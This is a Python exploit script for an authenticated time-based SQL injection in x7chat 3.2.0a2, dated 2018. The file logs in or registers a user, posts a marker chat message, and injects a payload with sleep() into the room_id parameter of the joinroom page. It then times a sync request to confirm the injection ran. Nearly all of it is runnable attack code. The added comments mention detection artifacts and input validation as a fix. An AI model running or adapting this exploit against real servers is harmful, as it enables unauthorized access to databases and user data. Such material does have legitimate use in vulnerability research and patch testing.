# Exploit Title: x7chat 3.2.0a2 authenticated SQL injection
# Date: 2nd of July, 2018
# Exploit Author: Mustafa Hasan (@strukt93)
import requests
import time
# --- Target and account configuration --------------------------------------
# Base URL of the x7chat index.php that every request in this file targets.
host = 'http://192.168.1.10/x7chat-3.2.0a2/index.php'

"""
The following username/password combination is used to
authenticate to the x7chat instance and send a special
message string to the room identified by room_id below.
If you wish to let the script register a new user before
exploitation, flip the register_new variable to True.
Otherwise, replace the credentials with your own.
"""
# Credentials consumed by login(), and by register() when register_new is True.
username = 'x7exploit'
password = 'x7exploit'
email = '[email protected]'  # Read only by register().
register_new = False  # True: register() creates the account; False: login() reuses it.

# Prefix of the marker message posted by send_message(). join_room() embeds the
# very same `message_base + timestamp` string into the injected SQL, so both
# sides must agree on it.
message_base = 'x7exploit_'  # Leave unchanged

# Room that receives the marker message, and the MySQL sleep() duration that
# run() later compares against the measured sync() latency.
room_no = 1
sleep_time = 3

# Value sent as the `room_id` query parameter by join_room(): the two {} slots
# are filled with the marker message text and sleep_time, in that order.
payload = "1))) or (((message.message = '{}' and sleep({}))#"
def login():
    """Authenticate with the configured username/password.

    Posts the credentials to ``?page=dologin`` with redirects disabled. A 302
    response is taken as success and the response cookies (the session) are
    returned; any other status prints a failure line and returns False.

    Returns:
        The ``requests`` cookie jar on success, or False.
    """
    login_params = {'page': 'dologin'}
    login_form = {
        'username': username,
        'password': password,
        'login_button': 'Login',
    }
    resp = requests.post(host, params=login_params, data=login_form,
                         allow_redirects=False)
    if resp.status_code != 302:
        # NOTE: this failure line carries the "[+]" prefix, unlike every other
        # failure message in the file, which uses "[-]".
        print("[+] Authentication failed")
        return False
    print("[+] Authenticated successfully")
    return resp.cookies
def register():
    """Create the configured account and return its session cookies.

    Posts the registration form to ``?page=doregister`` with redirects
    disabled. Success is a 302 whose ``Location`` header is exactly
    ``?page=chat``; the script treats a 302 to any other location as "the
    username is already taken". Returns the response cookies on success,
    False otherwise, printing a status line in every case.

    Returns:
        The ``requests`` cookie jar on success, or False.
    """
    reg_params = {'page': 'doregister'}
    reg_form = {
        'username': username,
        'password': password,
        'repassword': password,
        'email': email,
        'register_button': 'Create Account',
    }
    resp = requests.post(host, params=reg_params, data=reg_form,
                         allow_redirects=False)
    if resp.status_code != 302:
        print("[-] User couldn't be registered")
        return False
    # A fresh account is redirected straight into the chat; a missing header
    # here raises KeyError, exactly as the original did.
    if resp.headers['Location'] != '?page=chat':
        print("[-] Username already registered, try with the register_new flag set to False")
        return False
    print("[+] User registered successfully")
    return resp.cookies
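def send_message(cookies):
    """Post the marker message to room ``room_no`` and return its timestamp.

    The message body is ``message_base`` followed by ``str(time.time())``;
    join_room() embeds the same string in the injected SQL, which is why the
    timestamp is handed back to the caller. Prints a status line; returns the
    timestamp string on HTTP 200 and False on any other status.

    Defensive note: the marker message stays in the room as an artifact. A
    chat message consisting of ``x7exploit_`` followed by a Unix timestamp is
    a direct indicator that this script was run against the instance.

    Args:
        cookies: session cookies as returned by login() or register().

    Returns:
        The timestamp string used in the message, or False.
    """
    timestamp = str(time.time())
    params = {'page': 'send'}
    data = {
        'dest_type': 'room',
        'room': room_no,
        'message': message_base + timestamp,
    }
    response = requests.post(host, params=params, data=data, cookies=cookies)
    if response.status_code == 200:
        print("[+] Special message posted to chat room #{}".format(room_no))
        return timestamp
    # Failure line fixed: "ro chat room" -> "to chat room".
    print("[-] Special message couldn't be posted to chat room #{}".format(room_no))
    return False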
def join_room(cookies, timestamp):
    """Send the injected ``room_id`` value to ``?page=joinroom``.

    Fills the two placeholders of ``payload`` with the marker message
    (``message_base + timestamp``) and ``sleep_time``, and passes the result
    as the ``room_id`` query parameter of a GET request. Returns True on
    HTTP 200 and False otherwise, printing a status line either way.

    Defensive note: server-side this is a ``joinroom`` request whose
    ``room_id`` is not an integer but a string containing SQL tokens; such
    requests are easy to spot in access logs, and a numeric-only check on
    ``room_id`` (or a parameterized query) would reject them.

    Args:
        cookies: session cookies as returned by login() or register().
        timestamp: the string returned by send_message().

    Returns:
        True when the server answered 200, else False.
    """
    injected_room_id = payload.format(message_base + timestamp, sleep_time)
    query = {'page': 'joinroom', 'room_id': injected_room_id}
    resp = requests.get(host, params=query, cookies=cookies)
    sent = resp.status_code == 200
    if sent:
        print("[+] SQL injection payload sent")
    else:
        print("[-] SQL injection payload couldn't be sent")
    return sent
def sync(cookies):
    """Time a ``?page=sync`` request and return the elapsed seconds.

    This is the timing oracle used by run(): run() expects the injected
    sleep() to add roughly ``sleep_time`` seconds to this request's latency.
    Returns ``response.elapsed.total_seconds()`` on HTTP 200; otherwise
    prints an error line and returns False.

    Args:
        cookies: session cookies as returned by login() or register().

    Returns:
        Elapsed seconds as a float, or False.
    """
    print("[*] Checking if the payload will execute correctly...")
    resp = requests.get(host, params={'page': 'sync'}, cookies=cookies)
    if resp.status_code != 200:
        print("[-] An error occurred while checking")
        return False
    return resp.elapsed.total_seconds()
def quit():
    """Print the failure banner and terminate the script via ``exit()``.

    Shadows the builtin ``quit``; every failed step in run() ends here.
    """
    print("[-] Exploit failed")
    exit()
def run():
    """Drive the full sequence: session, marker message, injection, timing.

    Every step aborts through quit() on failure. Success is declared only
    when the timed sync() response lands strictly between ``sleep_time`` and
    ``sleep_time + 1`` seconds; nothing is printed when that window is
    missed.
    """
    cookies = register() if register_new else login()
    if not cookies:
        quit()
    timestamp = send_message(cookies)
    if not timestamp:
        quit()
    if not join_room(cookies, timestamp):
        quit()
    exec_time = sync(cookies)
    if not exec_time:
        quit()
    # The one-second window assumes the server's own response time is under
    # one second, as the original comment noted.
    if sleep_time < exec_time < sleep_time + 1:
        print("[+] Exploit succeeded (Y)")
# Unguarded entry point: run() executes on import as well as when the file is
# run as a script.
run()